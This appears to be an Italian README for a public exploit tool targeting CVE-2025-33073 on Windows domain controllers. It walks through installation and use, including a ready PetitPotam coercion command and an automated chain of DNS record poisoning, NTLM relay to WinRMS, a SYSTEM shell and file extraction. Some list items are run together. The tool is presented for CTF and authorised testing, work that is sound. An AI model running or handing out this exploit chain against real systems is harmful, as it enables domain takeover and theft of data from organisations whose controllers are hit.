
Strumento di sfruttamento universale per CVE-2025-33073 che prende di mira i controller di dominio Windows con privilegi DNSAdmins e WinRM abilitato.

Strumento di sfruttamento universale per CVE-2025-33073 che prende di mira i Domain Controller Windows con privilegi DNSAdmins e WinRM abilitato.
CVE-2025-33073 è una vulnerabilità critica che consente agli attaccanti di ottenere esecuzione di codice a livello di SYSTEM sui Domain Controller Windows tramite una combinazione di:
Questo PoC fornisce un framework di sfruttamento universale e automatizzato compatibile con qualsiasi dominio, qualsiasi nome utente e qualsiasi ambiente CTF.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
Lo script chiederà:
Terminale 1 - Esegui l'exploit:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
Terminale 2 - Esegui il comando coerce (copiato dall'output del Terminale 1):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
Risultato:
Lo script cerca ed estrae automaticamente:
*flag*.txt*root*.txt*user*.txtproof.txtSituati in: C:\Users\*\Desktop\
Tutti gli output vengono salvati in: /0pwn_exploit_<TIMESTAMP>/
relay.log - output del server NTLM relaydns.log - log delle operazioni DNSshell_output.log - comandi di shell e flag estratte1. DNS Poisoning (krbrelayx.dnstool)
└─> Modify/Create DNS record pointing to attacker IP
2. NTLM Relay Server (ntlmrelayx.py)
└─> Listen for incoming NTLM authentication
3. Coercion (nxc + PetitPotam)
└─> Force DC to authenticate to attacker IP
4. Relay → WinRMS
└─> Relay authentication to target WinRMS
5. SYSTEM Shell
└─> Execute commands as SYSTEM
6. Auto Flag Extraction
└─> Search and extract all flags
Modificare la variabile LONGHOST in exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
Modificare la funzione run_shell_commands() per cercare diversi pattern di file:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
Questo PoC è fornito per:
L'accesso non autorizzato ai sistemi informatici è illegale.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log per errorinc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # NTLM relay server output
├── dns.log # DNS operation details
└── shell_output.log # Extracted flags & command output
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[Demo e Screenshot] - [Prossimamente]

0pwn (uziii2208) - Concetto originale e ricerca AI Enhanced - Miglioramenti v1.0 ed estrazione automatica delle flag
Licenza MIT - Vedere il file LICENSE per i dettagli
AVVISO LEGALE:
Questo software è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale e punibile per legge.
Utilizzando questo strumento, accetti di:
I contributi sono benvenuti! Invia issue e pull request.
Per problemi, domande o miglioramenti:
Stato: ✅ Testato e verificato Versione: 1.0 (Universale) Ultimo aggiornamento: 2025